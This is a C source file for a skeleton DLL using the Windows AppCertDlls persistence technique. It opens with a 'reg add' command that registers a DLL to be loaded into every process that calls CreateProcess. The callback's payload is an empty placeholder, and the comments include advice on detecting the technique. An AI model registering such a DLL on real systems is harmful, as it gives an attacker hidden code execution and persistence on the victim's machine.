reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls" /V "AppCert" /T REG_EXPAND_SZ /D "c:\executable.dll" /F
#include <ntstatus.h>
#include <windows.h>
#include <stdio.h>
/*
 * Reason codes for the second argument of CreateProcessNotify; the
 * commented-out switch at the end of this file dispatches on them.
 * They are defined locally in this file. The per-code meanings noted below
 * are inferred from the names only -- TODO confirm against a trusted reference.
 */
/* presumably: the caller asks whether the image may run */
#define APPCERT_IMAGE_OK_TO_RUN 0x00000001L
/* presumably: notification that process creation was allowed */
#define APPCERT_CREATION_ALLOWED 0x00000002L
/* presumably: notification that process creation was denied */
#define APPCERT_CREATION_DENIED 0x00000003L
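/*
 * Export declaration for the CreateProcessNotify callback.
 * extern "C" suppresses C++ name mangling and __declspec(dllexport) places
 * the function in the DLL's export table. The definition follows below.
 */
extern "C" {
__declspec(dllexport) NTSTATUS NTAPI CreateProcessNotify(
    LPCWSTR lpApplicationName,
    ULONG uNotifyReason
);  /* a declaration must end with ';' before the closing brace of the linkage block */
}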
/*
 * CreateProcessNotify - callback exported by this DLL for the AppCertDlls
 * mechanism (MITRE ATT&CK T1546.009).
 *
 * lpApplicationName: wide-character string supplied by the caller; presumably
 *                    the image being started -- not read by this skeleton.
 * ulReason:          notify reason (see the APPCERT_* codes above); not read
 *                    by this skeleton.
 *
 * Returns STATUS_SUCCESS unconditionally.
 *
 * Defensive note: a DLL registered under
 * HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls is loaded
 * into processes that call the CreateProcess family of APIs, so anything placed
 * in this function would run inside each of them. Monitor that key for new or
 * modified values and verify the signature and origin of every DLL it references.
 */
NTSTATUS NTAPI CreateProcessNotify(LPCWSTR lpApplicationName, ULONG ulReason) {
    /* The page's author left a payload placeholder here; nothing is implemented. */
    return STATUS_SUCCESS;
}
/*
 * DllMain - DLL entry point.
 *
 * hinstDLL, lpReserved: not used.
 * fdwReason:            attach/detach notification code; every value is ignored.
 *
 * Performs no initialisation or teardown and returns TRUE for every reason.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        /* nothing to do for any notification */
        break;
    }
    return TRUE;
}
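/*
 Disabled alternative body for CreateProcessNotify: it reports the notify reason
 with OutputDebugStringA and returns STATUS_SUCCESS in every case. It refers to
 uNotifyReason (the prototype's parameter name), whereas the definition above
 names that parameter ulReason. The final brace closes the function.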
switch (uNotifyReason)
{
case APPCERT_IMAGE_OK_TO_RUN:
OutputDebugStringA("APPCERT_IMAGE_OK_TO_RUN");
return STATUS_SUCCESS;
case APPCERT_CREATION_ALLOWED:
OutputDebugStringA("APPCERT_CREATION_ALLOWED");
return STATUS_SUCCESS;
case APPCERT_CREATION_DENIED:
OutputDebugStringA("APPCERT_CREATION_DENIED");
return STATUS_SUCCESS;
default:
OutputDebugStringA("APPCERT_UNKNOWN");
return STATUS_SUCCESS;
}
}
*/